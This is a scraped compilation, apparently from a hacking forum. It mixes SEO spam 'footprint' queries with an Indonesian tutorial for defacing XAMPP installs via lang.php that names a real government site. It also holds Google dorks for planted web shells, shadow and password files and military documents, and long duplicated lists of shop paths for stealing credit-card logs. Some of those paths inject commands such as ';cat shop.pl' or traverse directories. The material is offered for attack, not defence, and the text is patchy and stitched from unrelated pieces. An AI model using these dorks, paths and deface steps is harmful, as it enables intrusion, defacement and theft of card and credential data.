Scraping Ezine Articles Author Footprints

Code:

· site:ezinearticles.com "author name"

Reff Pages Footprints

Code:

· "usage statistics" "Summary Period: September 2012"

· "usage statistics" "Summary Period: October 2012"

· "Generated by Webalizer"

· inurl:awstats.pl intitle:statistics

· "Created by awstats"

· inurl:usage_200811 html

· "produced by wusage"

· "inurl:twatch/latest" html

· inurl:stats/REFERRER.html

Showthread.php Footprints

Code:

· inurl:%KW% showthread.php

· intitle:%KW% showthread.php

· %KW% showthread.php

· Ubb.threads Footprints

· Code:

· inurl:%KW% "powered by ubb.threads"

· intitle:%KW% "powered by ubb.threads"

· %KW% "powered by ubb.threads"

Lofiversion Footprints

Code:

· inurl:%KW% lofiversion

· intitle:%KW% lofiversion

· %KW% lofiversion

Forumdisplay.php Footprints

Code:

· inurl:%KW% /forumdisplay.php?

· intitle:%KW% /forumdisplay.php?

· %KW% /forumdisplay.php?

New thread Footprints

Code:

· inurl:%KW% new thread

· intitle:%KW% new thread

· %KW% new thread

New topic Footprints

Code:

· inurl:%KW% new topic

· intitle:%KW% new topic

· %KW% new topic

E-Mail Opt-in FootPrints

Code:

· "Sign up for email subscriptions"

· "Enter your email address to subscribe"

· "Join Our Email List"

· "Subscribe to our free email newsletter"

· "Enter email address to subscribe"

· "Subscribe for E-mail Updates"

· "Please enter your email address below to be added to our email list"

Few more Do-Follow Blogs Footprints

Code:

· "Please login to be Post Comments!"

· "Blog Comments Powered by Disqus"

· "Leave a new comment"

· "Comment on the Post"

· "Related content"

· "Enter your comment:"

· "Comments on this entry:"

· "Sign in to comment on this entry."

· "Comments (You may use HTML tags for style)"

· "Login or register to post comments"

· "Login or register to post or rate comments"

· "Leave a Reply" Name "(required)"' 'Mail (will not be published) "(required)"' "Website"

· "You must be registered and logged in to leave comments."

· "Sign in to Comment On this Entry"

Other Language Do-Follow Blogs Footprints

Code:

· "comentar"

· "Répondre a cet article"

· "Scrivi commento"

· "Anade un comentario"

· "Ajouter un commentaire"

· "Dejar un comentario"

· "PridaÅ¥ komentár"

· "Komentáre"

· "Écrire un commentaire"

· "Dodaj nowÄ… odpowiedź"

· "kommentarer"




· "Comentarios para este Artículo"


jadi mari mulai

exploit: 

Dork :
allinurl:/xampp/



sekarang kita punya website ini


 
jika link itu déferrent hanya mengubahnya ke ini
http://www.puertoesmeraldas.gob.ec/xampp/index.php
untuk deface itu
hanya menghapus index.php
dan menambahkan untuk itu lang.php ? kj - fido_was_here
http://www.puertoesmeraldas.gob.ec/xampp/lang.php?kj-fido_was_here
kj - fido sini mengubahnya nama Hacked_By_you Anda
 
kesalahan akan muncul
itu berarti Oke/




sekarang pergi dan memeriksa situs tetapi jangan lupa untuk menambahkan link
xampp / lang.tmp
untuk
http://www.puertoesmeraldas.gob.ec
=
ini: 3
 
 http://www.puertoesmeraldas.gob.ec/xampp/lang.tmp



Keberhasilan !!



 
 
sekarang pergi dan hack







For Shells ::
+rwx -honeypot -honeypage -"honey page" -googlehacking -dork -treat -topic

r57 #full7shell +uname +rwx -honeypot -honeypage -"honey page"

-googlehacking -dork -treat -topic

r57
intitle:r57shell +uname -bbpress

MyShell
intitle:MyShell 1.1.0 build 20010923

PHP Shell
intitle:"PHP Shell *" "Enable stderr" filetypehp

MyShell
intitle:MyShell 1.1.0 build 20010923

PHPKonsole PHPShell
PHPKonsole PHPShell filetypehp -echo

c99
inurl:c99.php
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16 download
================================

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index


inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."

top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart



ALTERNATIVE INPUTS

inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
def ault.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
def ault.aspdvwssr.dll
cart32.exe
add.exe
index.jsp
*******Servlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
uplo ad.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendm ail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
f ilemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dum penv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
i nfosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconn ect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.ht ml
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwsta ts.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
s endmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi


robots.txt
/admin.mdb
/shopping.mdb
/arg;
/stats/styles.css
/statshelp.htm
/favicon.ico
/stats/admin.mdb
/shopdbtest.asp
/cgi-bin/test.cgi
/cgi-bin/test.pl
/cgi-bin/env.cgi
/photos/protest/styles.css
/cgi-bin/whereami.cgi
/shopping400.mdb
/cgi/test.cgi
/cgi-bin/test2.pl
/photos/protest/kingmarch_02.html
/chevy/index.htm
/cgi-bin/glocation.cgi
/cgi-bin/test2.cgi
/ccbill/glocation.cgi
/cgi-bin/styles.css
/shopping350.mdb
/cgi-bin/shopper.cgi
/shopadmin.asp
/news_2003-02-27.htm
/cgi-bin/whois.cgi
3 /cgi-bin/calendar.pl
3 /cgi-bin/calendar/calendar.pl
3 /cgibin/styles.css
3 /venem.htm
2 /stats/www.newbauersflowers.com/stats/04-refers.htm
2 /cgi-bin/where.pl
2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
2 /cgibin/recon.cgi
2 /cgibin/test.cgi
2 /WebShop/templates/styles.css
2 /stats/shopping350.mdb
2 /cgi-bin/mailform.cgi
2 /cgi-bin/recon.cgi
2 /chevy
2 /cgi-bin/servinfo.cgi
2 /acart2_0.mdb
2 /cgi-bin/where.cgi
2 /chevy/
2 /stats/www.savethemall.net/stats/19-refers.htm
2 /ccbill/secure/ccbill.log
2 /cgi/recon.cgi
2 /stats/www.gregoryflynn.com/chevy
2 /ibill/glocation.cgi
2 /ccbill/whereami.cgi
2 /ibill/whereami.cgi
2 /apps_trial.htm
2 /cgi-bin/lancelot/recon.cgi
2 /cgi-bin/DCShop/Orders/styles.css
1 /cgi-bin/htmanage.cgi
1 /stats/www.tysons.net/stats/05-refers.htm
1 /cgi-bin/mastergate/add.cgi
1 /cgi-bin/openjournal.cgi
1 /cgi-bin/calendar/calendar_admin.pl
1 /cgibin/ibill/count.cgi
1 /cgi-bin/nbmember2.cgi
1 /cgi-bin/mastergate/count.cgi
1 /cgi-bin/mastergate/accountcreate.cgi
1 /cgi-bin/ibill/accountcreate.cgi
1 /cgibin/MasterGate2/count.cgi
1 /cgi-bin/amadmin.pl
1 /cgibin/mailform.cgi
1 /cgibin/mastergate/count.cgi
1 /cgibin/harvestor.cgi
1 /cgibin/igate/count.cgi
1 /WebShop
1 /shopdisplaycategories.asp
1 /cgi-bin/DCShop/Orders/orders.txt
1 /cgi-bill/revshare/joinpage.cgi
1 /stats/www.gregoryflynn.com/stats/19-refers.htm
1 /cgi-local/DCShop/auth_data/styles.css
1 /cgi-bin/add-passwd.cgi
1 /cgi-bin/MasterGate/count.cgi
1 /apps_shop.htm%20/comersus/database/comersus.mdb
1 /data/verotellog.txt
1 /epwd/ws_ftp.log
1 /stats/www.dialacure.com/stats/16-refers.htm
1 /cgi/MasterGate2/count.cgi
1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
1 /wwii/styles.css
1 /cgi-bin/admin.mdb
1 /stats/www.gregoryflynn.com/stats/31-refers.htm
1 /cgi-bin/ibill-tools/count.cgi
1 /WebShop/templates/cc.txt
1 /cgibin/ibill/accountcreate.cgi
1 /cgi-bin/count.cgi
1 /cgi-local/DCShop/auth_data/auth_user_file.txt
1 /cgi/mastergate/count.cgi
1 /cgi-bin/EuroDebit/addusr.pl
1 /cgi-bin/dbm-passwd.cgi
1 /cgi/igate/accountcreate.cgi


3 /cgi-bin/calendar.pl
3 /cgi-bin/calendar/calendar.pl
3 /cgibin/styles.css
3 /venem.htm
2 /stats/www.newbauersflowers.com/stats/04-refers.htm
2 /cgi-bin/where.pl
2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
2 /cgibin/recon.cgi
2 /cgibin/test.cgi
2 /WebShop/templates/styles.css
2 /stats/shopping350.mdb
2 /cgi-bin/mailform.cgi
2 /cgi-bin/recon.cgi
2 /chevy
2 /cgi-bin/servinfo.cgi
2 /acart2_0.mdb
2 /cgi-bin/where.cgi
2 /chevy/
2 /stats/www.savethemall.net/stats/19-refers.htm
2 /ccbill/secure/ccbill.log
2 /cgi/recon.cgi
2 /stats/www.gregoryflynn.com/chevy
2 /ibill/glocation.cgi
2 /ccbill/whereami.cgi
2 /ibill/whereami.cgi
2 /apps_trial.htm
2 /cgi-bin/lancelot/recon.cgi
2 /cgi-bin/DCShop/Orders/styles.css
1 /cgi-bin/htmanage.cgi
1 /stats/www.tysons.net/stats/05-refers.htm
1 /cgi-bin/mastergate/add.cgi
1 /cgi-bin/openjournal.cgi
1 /cgi-bin/calendar/calendar_admin.pl
1 /cgibin/ibill/count.cgi
1 /cgi-bin/nbmember2.cgi
1 /cgi-bin/mastergate/count.cgi
1 /cgi-bin/mastergate/accountcreate.cgi
1 /cgi-bin/ibill/accountcreate.cgi
1 /cgibin/MasterGate2/count.cgi
1 /cgi-bin/amadmin.pl
1 /cgibin/mailform.cgi
1 /cgibin/mastergate/count.cgi
1 /cgibin/harvestor.cgi
1 /cgibin/igate/count.cgi
1 /WebShop
1 /shopdisplaycategories.asp
1 /cgi-bin/DCShop/Orders/orders.txt
1 /cgi-bill/revshare/joinpage.cgi
1 /stats/www.gregoryflynn.com/stats/19-refers.htm
1 /cgi-local/DCShop/auth_data/styles.css
1 /cgi-bin/add-passwd.cgi
1 /cgi-bin/MasterGate/count.cgi
1 /apps_shop.htm%20/comersus/database/comersus.mdb
1 /data/verotellog.txt
1 /epwd/ws_ftp.log
1 /stats/www.dialacure.com/stats/16-refers.htm
1 /cgi/MasterGate2/count.cgi
1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
1 /wwii/styles.css
1 /cgi-bin/admin.mdb
1 /stats/www.gregoryflynn.com/stats/31-refers.htm
1 /cgi-bin/ibill-tools/count.cgi
1 /WebShop/templates/cc.txt
1 /cgibin/ibill/accountcreate.cgi
1 /cgi-bin/count.cgi


1 /cgi-local/DCShop/auth_data/auth_user_file.txt
1 /cgi/mastergate/count.cgi
1 /cgi-bin/EuroDebit/addusr.pl
1 /cgi-bin/dbm-passwd.cgi
1 /cgi/igate/accountcreate.cgi
1 /cgi-bin/store/Log_files/your_order.log
store/log_files/your_order.log
/cgi-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log
/scripts/cart32.exe
/cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt
/cgi-local/cart.pl
/PDG_Cart/order.log
/config/datasources/expire.mdb
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/orders/orders.txt
/cgis/cart.pl
/webcart/carts
/cgi-bin/cart32.exe/cart32clientlist
/cgi/cart.pl
/comersus/database/comersus.mdb
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
/productcart/database/EIPC.mdb
/shoponline/fpdb/shop.mdb
/config/datasources/myorder.mdb
/PDG_Cart/shopper.conf
/shopping/database/metacart.mdb
/bin/cart.pl
/cgi-bin/cart32.ini
/database/comersus.mdb
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-bin/orders.txt
/cgi-bin/store/Admin_files/your_order.log
/test/test.txt
/fpdb/shop.mdb
/cgibin/shop/orders/orders.txt
/shopadmin1.asp
/cgi-bin/shop.cgi
/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
/cgi-bin/PDG_cart/card.txt
/shopper.cgi?preadd=action&key=PROFA&template=order 1.log
/store/shopdbtest.asp
/log_files/your_order.log
/_database/expire.mdb
/HyperStat/stat_what.log
/cgibin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/SHOP/shopadmin.asp
/index.cgi?page=../admin/files/order.log
/vpshop/shopadmin.asp
/webcart/config
/PDG/order.txt
/cgi-bin/shopper.cgi
/orders/order.log
/orders/db/zzzbizorders.log.html
/easylog/easylog.html
/cgi-bin/store/Log_files/your_order.log
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=sh opping400.mdb
/comersus_message.asp?
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/admin/html_lib.pl
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=my order.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt


/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/HBill/htpasswd
/bin/shop/auth_data/auth_user_file.txt
/cgi-bin/cs/shopdbtest.asp
/mysql/shopping.mdb
/Catalog/config/datasources/Products.mdb
/trafficlog
/cgi/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/store/cgi-bin/Admin_files/expire.mdb
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/mc.txt
/cgi-bin/mall2000.cgi
/cgi-win/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/store/commerce.cgi
/scripts/shop/orders/orders.txt
/product/shopping350.mdb
/super_stats/access_logs
/cgi-local/orders/orders.txt
/cgi-bin/PDG_Cart/mc.txt
/cgibin/cart32.exe
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other/risinglogorder.log
/cgibin/password.txt
/Catalog/cart/carttrial.dat
/catalog/Admin/Admin.asp
/ecommerce/admin/user/admin.asp
/data/productcart/database/EIPC.mdb
/store/admin_files/commerce_user_lib.pl
/cgi-bin/store/index.cgi
/paynet.txt
/config/datasources/store/billing.mdb
/_database/shopping350.mdb
/cgi-bin/shopper.exe?search
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/store/Admin_files/orders.txt
/cgi-bin/store/commerce_user_lib.pl
/cgi-sys/pagelog.cgi
/cgi-sys/shop.pl/page=;cat%20shop.pl
/scripts/weblog
/fpdb/shopping400.mdb
/htbin/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=my order.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/mall_log_files/
/cgi-bin/perlshop.cgi
/tienda/shopdbtest.asp
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=sh opping.mdb
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/WebShop/logs/ck.log
/fpdb/shopping300.mdb
/mysql/store.mdb
/cgi-bin/store/Admin_files/commerce_user_lib.pl
/config.dat
/order/order.log
/commerce_user_lib.pl
/Admin_files/AuthorizeNet_user_lib.pl
/cvv2.asp
/cgi-bin/cart32/CART32-order.txt
/wwwlog
/cool-logs/mlog.html
/cgi-bin/pass/merchant.cgi.log
/cgi-local/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/admin/admin_conf.pl
/cgi-bin/pdg_cart/order.log
/cgi/PDG_Cart/order.log
/Admin_files/ccelog.txt
/cgi-bin/orders/mc.txt
/cgi/cart32.exe
/ecommerce/admin/admin.asp
/scripts/DCShop/auth_data/auth_user_file.txt
/Catalog/config/datasources/Expire.mdb
/ecommerce/admin/shopdbtest.asp
/mysql/mystore.mdb
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=sh opping.asp
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
/cgi-bin/Count.cgi?df=callcard.dat
/logfiles/
/shopping/shopping350.mdb
/admin/configuration.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/cart32.exe
/cgi-bin/dcshop.cgi
/cgi-win/shop/auth_data/auth_user_file.txt
/shopping400.mdb
/HBill/config
/cgi-bin/shop/index.cgi?page=../admin/files/order.log
/search=action&keywords=GSD%20&template=order.log
/WebCart/orders.txt
/PDG_Cart/authorizenets.txt
/cgi-bin/AnyForm2
/~gcw/cgi-bin/Count.cgi?df=callcard.dat


/cgi-bin/PDG_Cart/order.log
/expire.mdb
/logger/
/webcart-lite/orders/import.txt
/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/cart32.exe
/dc/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/shop.pl/page=shop.cfg
/cgi-local/cart32.exe
/cgi-win/pagelog.cgi
/cgi-win/shop/orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-bin/www-sql;;;
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=or der.log
/scripts/orders/orders.txt
/cgi-local/shop.pl/shop.cfg
/search=action&keywords=cwtb%20&template=expire.mdb
/php/mylog.phtml
/config/datasources/shopping.mdb
/php-coolfile/action.php?action=edit&file=config.php
/cgi-bin/ezmall2000/mall2000.cgi
/cgi/DCShop/orders/orders.txt
/cgi-local/shop.pl
/cgis/DCShop/orders/orders.txt
/product/shopdbtest.asp
/ASP/cart/database/metacart.mdb
/cgi-bin/cgi-lib.pl
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/search=action&keywords=cwtb%20&template=order.log
/mysql/expire.mdb
/scripts/shop/auth_data/auth_user_file.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/Shopping%20Cart/shopdbtest.asp
/cgi/shop/auth_data/auth_user_file.txt
/shop/shopping350.mdb
/cgi-bin/store/Authorize_Net.pl
/scripts/DCShop/orders/orders.txt
/store/log_files/commerce_user_lib.pl
/shopping/shopadmin.asp
/cgi-bin/orderlog.txt
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/cool-logs/mylog.html
/cgibin/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgi-win/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=or der1.txt
/SHOP/shopdbtest.asp
/cgi/pagelog.cgi
/php/mlog.phtml
/cgi-bin/shop/apdproducts.mdb
/htbin/shop/auth_data/auth_user_file.txt
/server%20logfile;;;
/database/metacart.mdb
/cgi-local/shop/orders/orders.txt

POWERED BY - WWW.HACKERSCAFE.IN
" 1999-2004 FuseTalk Inc" -site:fusetalk.com
"2003 DUware All Rights Reserved"
"2004-2005 ReloadCMS Team."
"2005 SugarCRM Inc. All Rights Reserved" "Powered By SugarCRM"
"Active Webcam Page" inurl:8080
"Based on DoceboLMS 2.0"
"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"
"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"
"Calendar programming by AppIdeas.com" filetype:php
"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved" "Mambo is Free Software
released"
"Copyright 2004 © Digital Scribe v.1.4"
"Copyright © 2002 Agustin Dondo Scripts"
"CosmoShop by Zaunz Publishing" inurl:"cgi-bin/cosmoshop/lshop.cgi"
-V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*
"Cyphor (Release:" -www.cynox.ch
"delete entries" inurl:admin/delete.asp
"driven by: ASP Message Board"
"Enter ip" inurl:"php-ping.php"
"IceWarp Web Mail 5.3.0" "Powered by IceWarp"
"Ideal BB Version: 0.1" -idealbb.com
"index of" intext:fckeditor inurl:fckeditor
"inurl:/site/articles.asp?idcategory="
"Maintained with Subscribe Me 2.044.09p"+"Professional" inurl:"s.pl"
"Mimicboard2 086"+"2000 Nobutaka Makino"+"password"+"message" inurl:page=1
"News generated by Utopia News Pro" | "Powered By: Utopia News Pro"
"Obtenez votre forum Aztek" -site:forum-aztek.com
"Online Store - Powered by ProductCart"
"PhpCollab . Log In" | "NetOffice . Log In" | (intitle:"index.of." intitle:phpcollab|netoffice
inurl:phpcollab|netoffice -gentoo)
"portailphp v1.3" inurl:"index.php?affiche" inurl:"PortailPHP" -site:safari-msi.com
"running: Nucleus v3.1" -.nucleuscms.org -demo
"Software PBLang" 4.65 filetype:php
"SquirrelMail version 1.4.4" inurl:src ext:php
"Thank You for using WPCeasy"
"This page has been automatically generated by Plesk Server Administrator"
"This script was created by Php-ZeroNet" "Script . Php-ZeroNet"
"This website engine code is copyright" "2005 by Clever Copy" -inurl:demo
"This website powered by PHPX" -demo
"This website was created with phpWebThings 1.4"
"Welcome to the versatileBulletinBoard" | "Powered by versatileBulletinBoard"
"You have not provided a survey identification number" ERROR -xoops.org "please contact"
("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis
("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column,
Romance, eFiction")
("This Dragonfly™ installation was" | "Thanks for downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com
(intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc
(intitle:"metaframe XP Login")|(intitle:"metaframe Presentation server Login")
+"Powered by Invision Power Board v2.0.0..2"
+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
+intext:"powered by MyBulletinBoard"
Achievo webbased project management
allintitle:aspjar.com guestbook
E-market remote code execution
EarlyImpact Productcart
ext:php intext:"Powered by phpNewMan Version"
ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
filetype:cgi inurl:nbmember.cgi
filetype:cgi inurl:pdesk.cgi
filetype:cgi inurl:tseekdir.cgi
filetype:php intitle:"paNews v2.0b4"
filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
intext:"2000-2001 The phpHeaven Team" -sourceforge
intext:"2000-2001 The phpHeaven Team" -sourceforge
intext:"Calendar Program © Copyright 1999 Matt Kruse" "Add an event"
intext:"LinPHA Version" intext:"Have fun"
intext:"PhpGedView Version" intext:"final - index" -inurl:demo
intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com
intitle:"4images - Image Gallery Management System" and intext:"Powered by 4images 1.7.1"
intitle:"b2evo installer" intext:"Installer fur Version"
intitle:"blog torrent upload"
intitle:"EMUMAIL - Login" "Powered by EMU Webmail"
intitle:"HelpDesk" "If you need additional help, please email helpdesk at"
intitle:"igenus webmail login"
intitle:"Looking Glass v20040427" "When verifying an URL check one of those"
intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)
intitle:"myBloggie 2.1.1..2 - by myWebland"
intitle:"osTicket :: Support Ticket System"
intitle:"PHP TopSites FREE Remote Admin"
intitle:"phpDocumentor web interface"
intitle:"PowerDownload" ("PowerDownload v3.0.2 ©" | "PowerDownload v3.0.3 ©" )
-site:powerscripts.org
intitle:"View Img" inurl:viewimg.php
intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
intitle:admbook intitle:version filetype:php


intitle:guestbook "advanced guestbook 2.2 powered"
intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"
intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"
intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18"
intitle:PHPOpenChat inurl:"index.php?language="
intitle:welcome.to.horde
inurl:"/cgi-bin/loadpage.cgi?user_id="
inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3"
inurl:"/site/articles.asp?idcategory="
inurl:"comment.php?serendipity"
inurl:"extras/update.php" intext:mysql.php -display
inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4"
inurl:"messageboard/Forum.asp?"
inurl:"slxweb.dll"
inurl:"wfdownloads/viewcat.php?list="
inurl:*.exe ext:exe inurl:/*cgi*/
inurl:/SiteChassisManager/
inurl:cal_make.pl
inurl:chitchat.php "choose graphic"
inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
inurl:comersus_message.asp
inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php
inurl:database.php | inurl:info_db.php ext:php "Database V2.*" "Burning Board *"
inurl:directorypro.cgi
inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su
nombre de usuario" -ext:pdf -inurl:"download.php
inurl:gotoURL.asp?url=
inurl:install.pl intitle:GTchat
inurl:perldiver.cgi ext:cgi
inurl:resetcore.php ext:php
inurl:server.php ext:php intext:"No SQL" -Released
inurl:sphpblog intext:"Powered by Simple PHP Blog 0.4.0"
inurl:sysinfo.cgi ext:cgi
inurl:technote inurl:main.cgi*filename=*
inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk
inurl:ttt-webmaster.php
inurl:wiki/MediaWiki
Invision Power Board SSI.PHP SQL Injection
mnGoSearch vulnerability
phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6
| 0.9.7)
Quicksite demopages for Typo3
ReMOSitory module for Mambo
uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album
vBulletin version 3.0.1 newreply.php XSS
VP-ASP Shopping Cart XSS
WEBalbum 2004-2006 duda -ihackstuff -exploit
WebAPP directory traversal


"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_*******Id" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The script whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
